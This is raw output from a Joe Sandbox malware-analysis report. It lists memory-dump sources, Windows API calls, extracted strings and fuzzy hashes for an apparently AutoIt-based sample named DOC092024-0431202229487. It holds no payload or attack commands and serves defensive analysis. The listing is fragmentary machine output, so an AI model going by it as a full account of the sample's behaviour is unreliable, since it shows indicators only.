                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 325ce6be7c5cf35923134e529fa9f6855c924762600251b125be3af033c3b27d
                                                        • Instruction ID: 813777a0f915cbe83f34952af148fde2a1c0cb94b93536dc5258bc29773fae83
                                                        • Opcode Fuzzy Hash: 325ce6be7c5cf35923134e529fa9f6855c924762600251b125be3af033c3b27d
                                                        • Instruction Fuzzy Hash: CFE06D32540244AEEB315F74AC4D7983B21AB45335F00C226F769580E2C3794942CB21
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: f463c616dadd911c6362bb752568a5fce56937d14a651be5515060470aca5606
                                                        • Instruction ID: da621cc5ccf7453445b81455fb14cebb934498c8a823e8297e6982b3ef4f3f7e
                                                        • Opcode Fuzzy Hash: f463c616dadd911c6362bb752568a5fce56937d14a651be5515060470aca5606
                                                        • Instruction Fuzzy Hash: C8E04FB1500210EFDB206F71DC4C6693BB5EB4C3A0F11C406FD4A87211DA7C9D828B14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: d52ab38afc036f599a12013945db31bb774a85deedf6f9f6e92bc99038aaa78e
                                                        • Instruction ID: 3ea0d5af236cd2dd5de105ac1299ec989978a68f9a329d5f53a55030f700966e
                                                        • Opcode Fuzzy Hash: d52ab38afc036f599a12013945db31bb774a85deedf6f9f6e92bc99038aaa78e
                                                        • Instruction Fuzzy Hash: 46E046B1500210EFDB206F71DC4C6693BB9EB4C3A0F11C406F94A8B211DBBC9D828B04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: >$DEFINE
                                                        • API String ID: 4104443479-1664449232
                                                        • Opcode ID: b55aa93d5d0b645abb4e8c52d559b2cd93622cd6e7407b4edad53f82babe0875
                                                        • Instruction ID: 75e225f98f4eab24fe255ff2d4a4442706e4744d97256234dd08f49699919388
                                                        • Opcode Fuzzy Hash: b55aa93d5d0b645abb4e8c52d559b2cd93622cd6e7407b4edad53f82babe0875
                                                        • Instruction Fuzzy Hash: 91125E75A00209DFCF24DF58D490AEDB7B1FF48310F25815AE855AB395E738AD82CB90
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0074ECA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: a123ec687044b4404167cf85ef3c730ded3bfcb9911bf273af6a7ae241d28103
                                                        • Instruction ID: 05d9b2c3b414841e0baf86544dfd255fb6894457e8c51be86b989b1bba2fe520
                                                        • Opcode Fuzzy Hash: a123ec687044b4404167cf85ef3c730ded3bfcb9911bf273af6a7ae241d28103
                                                        • Instruction Fuzzy Hash: 3A9108B4600701EFDB14DF64C884B6ABBA5FF49720F24856DE94ADB291DB78E841CB60
                                                        APIs
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • __wcsnicmp.LIBCMT ref: 0075E785
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0075E84E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: e176212a5352c9ec20845962fa292ff096577a89a7143a1f1a2aa6eca85d9e72
                                                        • Instruction ID: 6ea4b48fd8975e8e1e899593041e57e2557eb25a55be089eda93dc1927631a6f
                                                        • Opcode Fuzzy Hash: e176212a5352c9ec20845962fa292ff096577a89a7143a1f1a2aa6eca85d9e72
                                                        • Instruction Fuzzy Hash: 92619375A00215EFCB18DF98C895EEEB7B4EF48310F004069F946AB291DB78AF84CB50
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00711B83
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00711B9C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 492b419f31bda69f6fa3519536d99dfa53f5cd56e6d51aac29d65cdbdd8fa034
                                                        • Instruction ID: 5d18520afdf81053a507f194b52c621f191fb9d9908c76a649725b6544fa24c9
                                                        • Opcode Fuzzy Hash: 492b419f31bda69f6fa3519536d99dfa53f5cd56e6d51aac29d65cdbdd8fa034
                                                        • Instruction Fuzzy Hash: 81514B71408744EBE320AF14E889BABBBECFF94354F41884DF1C8410A6EB75996DC766
                                                        APIs
                                                          • Part of subcall function 0071417D: __fread_nolock.LIBCMT ref: 0071419B
                                                        • _wcscmp.LIBCMT ref: 0075CF49
                                                        • _wcscmp.LIBCMT ref: 0075CF5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 494869bf6c0600faa95d88ee921b24c7b393bb60d3c7d61fba37f504584ffe41
                                                        • Instruction ID: a07f4be54f7b77ec6b01e657e2ec0e4c31f9f98a88fc74c5bfea82375709e19a
                                                        • Opcode Fuzzy Hash: 494869bf6c0600faa95d88ee921b24c7b393bb60d3c7d61fba37f504584ffe41
                                                        • Instruction Fuzzy Hash: 3241E632A00219BEDF11DBA4CC85FEF7BB9AF49714F000469F901AB1C1D7799A898751
                                                        APIs
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __getbuf.LIBCMT ref: 00739B8A
                                                        • __lseeki64.LIBCMT ref: 00739BFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                        • String ID: pMt
                                                        • API String ID: 3311320906-3104781615
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0077A668
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0077A67D
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0077961B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00779657
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755BE4
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00755C1F
                                                        Strings
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00766BDD
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        Strings
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00779269
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00779274
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • GetWindowRect.USER32(00000000,?), ref: 00779775
                                                        • GetSysColor.USER32(00000012), ref: 0077978F
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 007794A6
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007794B5
                                                        Strings
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755CF3
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00755D12
                                                        Strings
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0076544C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00765475
                                                        Strings
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00744557
                                                        • ___raise_securityfailure.LIBCMT ref: 0074463E
                                                        Strings
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                        • String ID: (}
                                                        • API String ID: 3761405300-1376107910
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: 6f4e4adee479917a33d6d9235a0ff49d6139dad73eab2fbaf6ffec9b7af44aa6
                                                        • Instruction ID: 59543e0e48b5c0031d34e6e248c3847ac2633ea2ae701d99e099477696abe44b
                                                        • Opcode Fuzzy Hash: 6f4e4adee479917a33d6d9235a0ff49d6139dad73eab2fbaf6ffec9b7af44aa6
                                                        • Instruction Fuzzy Hash: 3201D634200205ABCB209FA4C846FADB364EF48724F10851AF916AB2D1D779E805CB65
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0074C5E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: 3043f79e7fefe3711dbdb82b82a5bd0cae9a0fa94075c4a3b867a34ed129d9b2
                                                        • Instruction ID: 73c350457a3c74b9463b1b696b4c387dccc747262857fbc17727f5c755a48c58
                                                        • Opcode Fuzzy Hash: 3043f79e7fefe3711dbdb82b82a5bd0cae9a0fa94075c4a3b867a34ed129d9b2
                                                        • Instruction Fuzzy Hash: 7401F571641118EFCB4AEFA8CC55DFE7369AF423107144619F472E32C2DB38A809C750
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0074C4E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: 695edd86d4ff768216e5ef00fadaeccbf6cd435be54e27479635912512e321c2
                                                        • Instruction ID: 8df97c4f61f69693270ca59315ef883ec6bda5a00e2c750514c7df484ecbe2d4
                                                        • Opcode Fuzzy Hash: 695edd86d4ff768216e5ef00fadaeccbf6cd435be54e27479635912512e321c2
                                                        • Instruction Fuzzy Hash: 32018F71642108ABCB5AEFA8CA66EFF77A89F45300F144019A942F31C2DB5C9E0996A1
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0074C562
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: e357106dc71bfa5bcb1c4cc57a9d1cab727fe3d9f49319c19fac48d85d4fc7dc
                                                        • Instruction ID: 49581d0830060632d85ec08e12a1394d7e090cf5e0d3fb8a92ffb48ca198b30c
                                                        • Opcode Fuzzy Hash: e357106dc71bfa5bcb1c4cc57a9d1cab727fe3d9f49319c19fac48d85d4fc7dc
                                                        • Instruction Fuzzy Hash: 3B01A271642108ABCB06EBA8C956EFF73A89F01701F244019B503F31C2DB5C9E5996B1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 1b00da9bf49a8ebd0eb38d8c0534ba61d782863fd881dfc137f99157585853c3
                                                        • Instruction ID: 5e0f4abb49cadd0c2a75323495be778d255a4abd7786f4598789e25da0bff103
                                                        • Opcode Fuzzy Hash: 1b00da9bf49a8ebd0eb38d8c0534ba61d782863fd881dfc137f99157585853c3
                                                        • Instruction Fuzzy Hash: 59E0923360022967E720EAA59C0AF97FBACFB517A4F00402AA914E3082D6A89A4587D5
                                                        APIs
                                                        • __umatherr.LIBCMT ref: 0073DA2A
                                                          • Part of subcall function 0073DD86: __ctrlfp.LIBCMT ref: 0073DDE5
                                                        • __ctrlfp.LIBCMT ref: 0073DA47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __ctrlfp$__umatherr
                                                        • String ID: xnx
                                                        • API String ID: 219961500-221149
                                                        • Opcode ID: c0754d78a29210a5217a74c867a8e1d048e8350be0fe226cdd407caa9d0065db
                                                        • Instruction ID: b580f9e67cb4516ea1c8139bc3c1772acb9b5a56cf9c529724896408cafb78ee
                                                        • Opcode Fuzzy Hash: c0754d78a29210a5217a74c867a8e1d048e8350be0fe226cdd407caa9d0065db
                                                        • Instruction Fuzzy Hash: E4E06D7140860EEAEB117F90F90AAA93BA5EF04310F808095F98C14097DFBA89B49757
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0074B36B
                                                          • Part of subcall function 00732011: _doexit.LIBCMT ref: 0073201B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 65c04379620ae65e4a84fcbf55b742e7dfea2d84307c83cf56b3956686f4ec2a
                                                        • Instruction ID: 113240f46064a436dba19eb37c3ed1f8463f136109e061e6c26c5657bcaa5d53
                                                        • Opcode Fuzzy Hash: 65c04379620ae65e4a84fcbf55b742e7dfea2d84307c83cf56b3956686f4ec2a
                                                        • Instruction Fuzzy Hash: 5BD0127138431872D22926A97C1FFC966888F05F51F004016BF48655C38ADDACD182E9
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0078BAB8
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0078BCAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
